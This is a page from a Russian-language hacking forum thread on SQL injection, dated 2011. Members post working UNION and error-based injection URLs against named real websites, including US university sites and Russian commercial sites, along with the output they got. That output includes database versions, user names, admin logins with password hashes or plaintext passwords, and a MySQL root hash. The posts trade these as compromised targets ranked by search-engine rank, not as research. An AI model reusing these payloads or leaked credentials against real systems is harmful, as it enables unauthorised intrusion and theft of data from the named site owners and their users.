HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1437 из 1604 « Первая < 437937133713871427 1433 1434 1435 1436 1437 1438 1439 1440 1441 144714871537 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14361  
Старый 31.10.2011, 11:51
g0rm0n
Guest
Сообщений: n/a
Провел на форуме:
3951

Репутация: 0
По умолчанию
Код:
Code:
http://www.canaramblers.com/index.php?page=13+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3
5.0.91-log:db315217298:dbo315217298@cgi1402.int.bizland.n et

1:1:YES:admin:c50672216e6be50f327c7df719784fe3:
 
Ответить с цитированием

  #14362  
Старый 31.10.2011, 21:51
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
Цитата:
Сообщение от Simpliest  
Simpliest said:
Не пойму что за скул, может кто поможет реализовать?
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf'+and+1='1
Код:
Code:
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf%27+and+1=3+union+select+1,concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29++/*
Код:
Code:
http://il2.aviasibir.ru/mow/?page=pilot&pilotname==WA=Snurf%27+and+1=3+union+select+1,group_concat%28table_name%29+from+information_schema.tables+where+table_schema!=%27information_schema%27++/*
 
Ответить с цитированием

  #14363  
Старый 01.11.2011, 04:51
Unknown
Guest
Сообщений: n/a
Провел на форуме:
4100

Репутация: 74
По умолчанию
www.abw.byаналог нашему auto.ru

php5/MySQL/nginx

50К/сутки

Вообщем принимает индексный файл хреналион параметров - и 100500ый из них дырявый...

Индексный файл цепляет всего 1 единственную базу "auto" (283 таблицы). Рядом лежит форум (phpBB) но у него наверное своя база со своим юзером ибо его таблиц в тек.базе нет...

Но есть OpenX. Вероятнее всего версия 2.4 (то бишь OpenAds судя по таблицам):

Код:
Code:
openads.ab-daily.by/admin/index.php
abd39:738762a9001a63ee8b820f775325d1e7
А еще тут глобальный гемор с выводом! Вывод следует сразу за строкой [I]0x6775695F6865616465725F6163746976655F7461625F636F 6C6F72+--+&type_engine=&year1=1960&year2=2010&cost_val1=&co st_val2=&u_city=7&period=&sort=&x=41&y=6[/COLOR]
[/PHP]

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]view[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]source[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.abw.by/index.php?set_small_form_1=1&act=public_search&do=search&index=1&adv_type=1&model=&marka='+UNION+SELECT+count(*),2,3,4,5+from+users+--+&type_engine=&year1=1960&year2=2010&cost_val1=&cost_val2=&u_city=7&period=&sort=&x=41&y=6[/COLOR][/COLOR] 
Вообщем have fan
 
Ответить с цитированием

  #14364  
Старый 02.11.2011, 21:05
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию
http://www.bioen.utah.EDU/faculty/RDR/index.php?cat_id=-1+union+select+1,version()--

VERSION =5.5.11=

университет штата юта

PR6
 
Ответить с цитированием

  #14365  
Старый 03.11.2011, 11:18
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от BLurpi^_^  
BLurpi^_^ said:
http://www.fckhimki.ru/modules/news/index.php?current_id=1
http://www.inharmony.ru/news/news.php?id=31'
Просто решил довести ссылки до нормального вида

Код:
Code:
http://www.fckhimki.ru/modules/news/index.php?current_id=1+and+1=2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13
Sql Version: 5.0.90-log

Current User: fckhimki_new1@217.112.35.70

Current DB: fckhimki_new1

Тиц = 750

PR = 0

Юзверей нет =(

Код:
Code:
http://www.inharmony.ru/news/news.php?id=31+and+1=2+union+select+1,2,3,4,5,version(),7
Sql Version: 5.0.70-log

Current User: ba3177@localhost

Current DB: ba3177_db

Тиц = 130

PR = 0
 
Ответить с цитированием

  #14366  
Старый 03.11.2011, 13:45
g0rm0n
Guest
Сообщений: n/a
Провел на форуме:
3951

Репутация: 0
По умолчанию
Код:
Code:
http://www.pdasmart.ru/index.php?action=submenu&mtid=-13+union+select+concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29--+
5.1.56:a1_pdasmart:a1_pdasmart@localhost

admins--id,login,password,supervisor

1:white:555999:1,
 
Ответить с цитированием

  #14367  
Старый 03.11.2011, 20:34
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию
Первый пост =)

ТИЦ 275, PR 5

Все легко...

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//migavia.ru/corporation/?tid=999999.9+union+all+select+1,version(),user(),4,database()--[/COLOR][/COLOR] 
ТИЦ 30, PR 4

Чуть сложнее...

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.coyc.ru/types.php?tid=1+and(select+1+from(select+count(*),concat((select+(select+concat(user()))+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)tabletkO)+and+1=1[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14368  
Старый 04.11.2011, 10:04
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
В сорцах похоже проверка на валидность URL, поэтому пришлось делать CONCAT с http://google.com/

Код:
Code:
http://www.aquarette.com/adtausch/count.php?click=yes&yourid=8&id=3+and+1=5+union+select+CONCAT(0x687474703a2f2f676f6f676c652e636f6d2f,user())+--+
Нас редиректнит на

Код:
Code:
http://www.google.com/dbo88894615@212.227.127.162
Код:
Code:
http://www.aquarette.com/adtausch/count.php?click=yes&yourid=8&id=3+and+1=5+union+select+CONCAT(0x687474703a2f2f676f6f676c652e636f6d2f,concat_ws(0x3b,user(),database(),version()))+--+
Код:
Code:
http://www.google.com/dbo88894615@212.227.127.162;db88894615;4.0.27-max-log
 
Ответить с цитированием

  #14369  
Старый 05.11.2011, 02:54
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию
PR 8 ТИЦ 2000

http://www.washington.EDU/research/ls.php?id=-18+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

УНИВЕР



(по авторитетности вроде нашего МГУ)

VERSION DB =5.0.45=

там есть база с названием wordpress

вытянул оттуда

логин: admin

hash: $P$BCL7jmzj0nFwHYR0Z/tSk5ZtMMuS/2/

+там еще штук 5-6 друпаловских баз.

учетки студентов и пр..

добрался до базы mysql таблица user

host: washington.edu

login: root

hash: *5131AA9105DF140BDBB40A112188C23B35C639F5
 
Ответить с цитированием

  #14370  
Старый 05.11.2011, 12:09
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию
http://freeadvertisingforum.com/adserver/image.php?size_id=0%20union%20select%201,2,3,versi on%28%29,5,6,7,8,9,10,11

PR - 4
 
Ответить с цитированием
Ответ
Страница 1437 из 1604 « Первая < 437937133713871427 1433 1434 1435 1436 1437 1438 1439 1440 1441 144714871537 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ